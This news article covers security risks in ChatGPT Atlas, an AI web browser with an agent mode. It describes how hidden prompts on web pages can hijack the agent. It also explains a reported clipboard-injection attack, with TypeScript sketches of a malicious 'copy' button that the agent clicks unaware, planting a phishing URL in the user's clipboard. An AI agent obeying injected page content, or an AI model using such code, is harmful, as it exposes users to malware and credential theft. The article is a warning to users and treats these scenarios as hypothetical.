ChatGPT’s AI Browser Has a Nasty Security Vulnerability

This week, OpenAI released ChatGPT Atlas, the company’s first AI web browser. Atlas lets you surf the web like any other browser but, as you might expect, comes with ChatGPT integration. You can log into your account and tap into the assistant via the sidebar, and it will remember not only your past conversations, but your browsing history as well. Like other AI browsers, namely Perplexity’s Comet, Atlas has an “agent mode” that can take actions on your behalf: You can ask it to order you food through DoorDash or buy you plane tickets on Kayak instead of doing those things yourself.

While that might sound useful to ChatGPT fans, I have a hard time recommending the browser, considering the security vulnerabilities AI browsers currently face. Any browser with agentic features is vulnerable to prompt injection attacks: Bad actors can lace websites with hidden malicious prompts that the AI accepts as if they were written by the user. It might then take actions on the hacker’s behalf, like opening a financial site or rooting through your email. That seems like a large risk just to outsource some basic internet tasks to an AI bot.

But prompt injections aren’t the only vulnerability Atlas currently faces. According to a new discovery, the browser may put the user’s clipboard at risk as well.

How Atlas’s clipboard injection vulnerability works

Android Authority spotted a post on X from the ethical hacker known as Pliny the Liberator. According to Pliny, ChatGPT Atlas is vulnerable to clipboard injection, a type of attack that lets a bad actor write to your computer’s clipboard. The idea is this: A bad actor adds a “copy to clipboard” function to a button on their website. When you click the button, a script runs in the background that overwrites your clipboard with whatever the attacker wants. Maybe it’s a URL for a site designed to install malware on your devices; maybe it’s a URL for a site impersonating your bank. Either way, you don’t know your clipboard has been tampered with, so you might open a new tab and paste what you think was the last thing you copied, falling right into the trap.
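
To make the mechanics concrete, here is a minimal sketch, in TypeScript, of how such a button could be wired up on an attacker-controlled page. The button label and URL are hypothetical, and the exact payload Pliny demonstrated hasn’t been published; this is just the general shape of a clipboard-injection script.

```typescript
// Hypothetical clipboard-injection button on an attacker's page.
// The label and URL below are invented for illustration.

const ATTACKER_URL = "https://totally-not-your-bank.example/session-expired";

const button = document.createElement("button");
button.textContent = "Copy coupon code"; // looks harmless to a human or an AI agent

button.addEventListener("click", async () => {
  try {
    // Silently replace whatever the user last copied with the attacker's URL.
    // The click itself satisfies the user-gesture requirement browsers impose
    // on clipboard writes.
    await navigator.clipboard.writeText(ATTACKER_URL);
  } catch {
    // Clipboard access can still be blocked by permissions; a real attacker
    // would fall back to older tricks, like hijacking a copy event.
  }
});

document.body.appendChild(button);
```

Note that nothing in the button’s visible text gives the game away, which matters for what comes next.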

The particular risk with ChatGPT Atlas is its agentic features: When in agent mode, Atlas might click a malicious button like this on its own, without you ever knowing. One moment, you’ve asked Atlas to order you lunch; the next, the browser has unwittingly set you up to be hacked.

Pliny says OpenAI has evidently trained Atlas to recognize prompt injections, but the core “copy to clipboard” function is hidden from the AI’s sight. It’s a clever trick: The bot can hover over the button without detecting anything wrong with it, so it “clicks” without triggering any red flags.
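
To see why the trick works, compare what a page-reading agent plausibly sees with what the page actually runs. How Atlas inspects pages isn’t public, so treat this as an assumption-heavy sketch using the same hypothetical button as above.

```typescript
// What an agent reading the page likely sees: plain, benign-looking markup.
//
//   <button id="copy-coupon">Copy coupon code</button>
//
// What actually executes lives in a separate script the agent never reasons about:
document.getElementById("copy-coupon")?.addEventListener("click", () => {
  void navigator.clipboard.writeText(
    "https://totally-not-your-bank.example/session-expired",
  );
});
```

The malicious behavior is attached in JavaScript rather than spelled out anywhere in the visible page, so there is nothing in the text for the model to flag.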

For anyone who copies and pastes frequently throughout the day, this could be quite dangerous. You might copy something in one app, then ask ChatGPT Atlas to do something on your behalf. Without your knowing it, the browser clicks a malicious button that swaps out your clipboard. You then paste into your browser’s address bar, thinking you still have the original item copied, and instead land on a website claiming your banking session has expired and you need to log in. If you’re multitasking quickly, you might “sign in” without thinking, handing over your bank credentials and 2FA codes to an attacker.

These are hypotheticals: At this time, there are no documented cases of this type of attack hitting ChatGPT Atlas users. Then again, ChatGPT Atlas is two days old. To me, the convenience doesn’t seem worth the risk, especially since I have no issue using the internet on my own.
